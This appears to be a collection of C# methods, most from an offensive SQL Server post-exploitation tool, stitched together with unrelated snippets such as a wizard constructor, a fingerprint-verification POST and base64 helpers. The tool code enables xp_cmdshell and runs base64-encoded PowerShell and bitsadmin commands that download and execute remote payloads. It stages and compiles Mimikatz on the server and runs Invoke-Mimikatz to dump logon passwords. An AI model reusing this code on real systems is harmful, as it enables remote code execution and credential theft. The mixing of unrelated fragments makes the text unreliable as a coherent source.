public WizardViewModel() { this.PrevEnabled = false; this.NextEnabled = true; this.CloseEnabled = true; this.CheckEnabled = false; this.SkipEnabled = true; this.Loading = false; this.Permiso = new PermissionValidator(); this.Api = new ApiService(); this.Codificator = new EncodeBase64(); this.IsAnalyzing = false; this.IsScanning = false; var mainViewModel = MainViewModel.GetInstance(); this.token = mainViewModel.Token; this.user = mainViewModel.User; this.PositionWizard = 0; this.LoadSlides(); }
private void btnDownload_Click(object sender, RoutedEventArgs e) { var isActivated = cmdControl.isActivated; var isExecuted = cmdControl.isExecuted; if (isActivated == false && isExecuted == false) { var enableXpCmdShell = new EnableXpCmdShell { LootedServer = lstLooted.SelectedItem.ToString() }; try { Dispatcher.Invoke((Action) delegate { enableXpCmdShell.XpCmdShellStatus(); txtStatus.AppendText(enableXpCmdShell.Result); var cmdLandResult = _languageControl.SelectedLanguage.GetString("XPCmdShell2"); var contains = enableXpCmdShell.Result.Contains(cmdLandResult); if (contains == true) { isActivated = true; isExecuted = true; } }); } catch (Exception) { Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { txtStatus.AppendText(enableXpCmdShell.CmdException); }); } } if (isExecuted == true && isActivated == true) { Dispatcher.Invoke((Action) delegate { var clearText = "(new-object System.Net.WebClient).DownloadFile('" + txtUrl.Text + "', '" + txtSaveLocation.Text + "')"; clearText = EncodeBase64.ConvertTextToBase64NonBypass(clearText); var _execCode = string.Empty; _execCode += "EXEC xp_cmdshell '" + clearText + "'"; txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload5")}"); RevConn(_execCode); }); } }
private string ComputeVerification() { var key = tboxKey.Text; var templateEconded = EncodeBase64.ImageToBase64(template.FileBytes); var queryEconded = EncodeBase64.ImageToBase64(query.FileBytes); var ps = new[] { "key", key, "template", templateEconded, "query", queryEconded }; HttpWebRequest request = (HttpWebRequest)WebRequest.Create("http://localhost:53210/api/PrintVerification/"); request.Proxy = WebRequest.DefaultWebProxy; string str = ""; for (int i = 0; i + 1 < ps.Length; i += 2) { str += (ps[i]) + "=" + (ps[i + 1]) + "&"; } if (str.EndsWith("&")) { str = str.Substring(0, str.Length - 1); } request.Method = "POST"; request.ContentType = "application/x-www-form-urlencoded"; byte[] buffer = Encoding.ASCII.GetBytes(str); request.ContentLength = buffer.Length; Stream newStream = request.GetRequestStream(); newStream.Write(buffer, 0, buffer.Length); WebResponse response = request.GetResponse(); Stream sStream = response.GetResponseStream(); StreamReader reader = new StreamReader(sStream); string ResponseSt = reader.ReadToEnd(); reader.Close(); response.Close(); newStream.Close(); return(ResponseSt); }
private void RevConn(string execCode) { try { if (lstLooted.SelectedIndex != -1) { try { var isError = false; Dispatcher.Invoke((Action) delegate { _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString(); _postExploitation.ExploitCode = execCode; _postExploitation.RunExploit(); var result = _postExploitation.ExploitResult; isError = result.Contains("be resolved"); if (result == "\r\n") { txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("ExploitClearLog2")); } else if (isError == true) { txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("MessageDownload6")); } else if (isError == false) { var result2 = result.Contains("Completed"); if (result2 == true) { txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("MessageDownload8") + txtSaveLocation.Text); } } if (isError == true) { txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("MessageDownload7")); _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString(); txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload5")}"); var expCode = EncodeBase64.ConvertTextToBase64NonBypass("Invoke-WebRequest \"" + txtUrl.Text + "\" -OutFile \"" + txtSaveLocation.Text + "\""); _postExploitation.ExploitCode = "EXEC xp_cmdshell '" + expCode + "'"; _postExploitation.RunExploit(); var resultz = _postExploitation.ExploitResult; isError = false; isError = resultz.Contains("be resolved"); if (resultz == "\r\n") { txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("ExploitClearLog2")); } else if (isError == true) { txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("MessageDownload6")); } else if (isError == false) { txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("MessageDownload6") + txtSaveLocation.Text); } } }); } catch (Exception exp) { Dispatcher.Invoke((Action) delegate { txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2"))); }); } } else { Dispatcher.Invoke((Action) delegate { txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageExploitError1")}"); }); } } catch (Exception exp) { Dispatcher.Invoke((Action) delegate { txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2"))); }); } }
private void btnDownloadExecute_Click(object sender, RoutedEventArgs e) { var isActivated = cmdControl.isActivated; var isExecuted = cmdControl.isExecuted; if (isActivated == false && isExecuted == false) { var enableXpCmdShell = new EnableXpCmdShell { LootedServer = lstLooted.SelectedItem.ToString() }; try { Dispatcher.Invoke((Action) delegate { enableXpCmdShell.XpCmdShellStatus(); txtStatus.AppendText(enableXpCmdShell.Result); var cmdLandResult = _languageControl.SelectedLanguage.GetString("XPCmdShell2"); var contains = enableXpCmdShell.Result.Contains(cmdLandResult); if (contains == true) { isActivated = true; isExecuted = true; } }); } catch (Exception) { Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { txtStatus.AppendText(enableXpCmdShell.CmdException); }); } } if (isExecuted == true && isActivated == true) { if (rdBits.IsChecked == true) { try { if (!string.IsNullOrEmpty(txtUrl.Text) && !string.IsNullOrEmpty(txtSaveLocation.Text)) { var _execCode = string.Empty; Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { _execCode += "USE [master]\r\n"; _execCode += "EXEC xp_cmdshell '\"net start BITS\"';\r\n"; txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload1")}"); RevConn(_execCode, 0); _execCode += "USE [master]\r\n"; _execCode += "EXEC xp_cmdshell '\"bitsadmin /transfer WarSQLiJob /download /priority normal " + txtUrl.Text + " " + txtSaveLocation.Text + "\"';\r\n"; txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload2")}"); RevConn(_execCode, 0); _execCode += "USE [master]\r\n"; _execCode += "EXEC xp_cmdshell '\"" + txtSaveLocation.Text + "\"';\r\n"; txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload3")}"); RevConn(_execCode, 0); }); } } catch (Exception exp) { Dispatcher.Invoke((Action) delegate { txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2"))); }); } } else { Dispatcher.Invoke((Action) delegate { var clearText = "(new-object System.Net.WebClient).DownloadFile('" + txtUrl.Text + "', '" + txtSaveLocation.Text + "')"; clearText = EncodeBase64.ConvertTextToBase64(clearText); var _execCode = string.Empty; _execCode += "EXEC xp_cmdshell '" + clearText + "'"; txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload5")}"); RevConn(_execCode, 1); _execCode = string.Empty; _execCode += "EXEC xp_cmdshell '" + txtSaveLocation.Text + "'\r\n"; txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload3")}"); RevConn(_execCode, 0); }); } } }
private void BtnConvert_OnClick(object sender, RoutedEventArgs e) { txtBase64.Text = EncodeBase64.ConvertTextToBase64(txtClearText.Text); }
private void btnRun_Click(object sender, RoutedEventArgs e) { var isActivated = cmdControl.isActivated; var isExecuted = cmdControl.isExecuted; if (isActivated == false && isExecuted == false) { var enableXpCmdShell = new EnableXpCmdShell { LootedServer = lstLooted.SelectedItem.ToString() }; try { Dispatcher.Invoke((Action) delegate { enableXpCmdShell.XpCmdShellStatus(); txtStatus.AppendText(enableXpCmdShell.Result); var cmdLandResult = _languageControl.SelectedLanguage.GetString("XPCmdShell2"); var contains = enableXpCmdShell.Result.Contains(cmdLandResult); if (contains == true) { isActivated = true; isExecuted = true; } }); } catch (Exception) { Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { txtStatus.AppendText(enableXpCmdShell.CmdException); }); } } if (isExecuted == true && isActivated == true) { if (rdLocal.IsChecked == true) { var savedFileNAme = string.Empty; var mimiBinary = File.ReadAllBytes(@"Scanner\Mimikatz\1.txt"); try { Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString(); _postExploitation.CreateBinaryTable(); txtStatus.AppendText(_postExploitation.ExploitResult); _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString(); _postExploitation.BinaryData = mimiBinary; _postExploitation.InsertBinaryData(); txtStatus.AppendText(_postExploitation.ExploitResult); }); } catch (Exception exp) { Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2"))); }); } try { _postExploitation.ExploitCode = string.Empty; var rnd = new Random(); var chr = "0123456789ABCDEFGHIJKLMNOPRSTUVWXYZ".ToCharArray(); var randomFileName = string.Empty; for (int i = 0; i < 12; i++) { randomFileName += chr[rnd.Next(0, chr.Length - 1)].ToString(); } var extension = "txt"; _postExploitation.ExploitCode += "DECLARE @cmd VARCHAR(8000);"; _postExploitation.ExploitCode += "SET @cmd = 'bcp.exe \"SELECT CAST(binaryTable AS VARCHAR(MAX)) FROM WarSQLiTemp\" queryout \"C:\\Users\\MSSQLSERVER\\" + randomFileName + "." + extension + "\" -c -T';"; _postExploitation.ExploitCode += "EXEC xp_cmdshell @cmd;"; Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString(); _postExploitation.RunExploit(); txtStatus.AppendText(_postExploitation.ExploitResult); txtStatus.AppendText("File Saved: C:\\Users\\MSSQLSERVER\\" + randomFileName + "." + extension); savedFileNAme = "C:\\Users\\MSSQLSERVER\\" + randomFileName + "." + extension; }); } catch (Exception exp) { Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2"))); }); } try { Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString(); _postExploitation.RemoveTempTable(); txtStatus.AppendText(_postExploitation.ExploitResult); }); } catch (Exception exp) { Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2"))); }); } try { Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { _postExploitation.ExploitCode = string.Empty; _postExploitation.ExploitCode += "EXEC xp_cmdshell 'C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /out:C:\\Users\\MSSQLSERVER\\eyup.exe " + savedFileNAme + "';"; _postExploitation.RunExploit(); txtStatus.AppendText(_postExploitation.ExploitResult); }); Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { _postExploitation.ExploitCode = string.Empty; _postExploitation.ExploitCode += "EXEC xp_cmdshell 'cmd.exe /c C:\\Users\\MSSQLSERVER\\eyup.exe';"; _postExploitation.RunExploit(); txtStatus.AppendText(_postExploitation.ExploitResult); }); } catch (Exception exp) { Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2"))); }); } } else { try { Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString(); var sendMimiText = "IEX (New-Object Net.WebClient).DownloadString('" + txtUrl.Text + "'); Invoke-Mimikatz -Command \"privilege::debug sekurlsa::logonPasswords exit\""; var psBs64 = EncodeBase64.ConvertTextToBase64(sendMimiText); _postExploitation.ExploitCode = string.Empty; _postExploitation.ExploitCode += "EXEC xp_cmdshell '" + psBs64 + "';"; _postExploitation.RunExploit(); txtStatus.AppendText(_postExploitation.ExploitResult); }); } catch (Exception exp) { Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2"))); }); } } } }
public static string ToView(string msg) { EncodeBase64 simpleQuote = new EncodeBase64(); return(simpleQuote.Decode(msg)); }
public static string ToDatabase(string msg) { EncodeBase64 simpleQuote = new EncodeBase64(); return(simpleQuote.Encode(msg)); }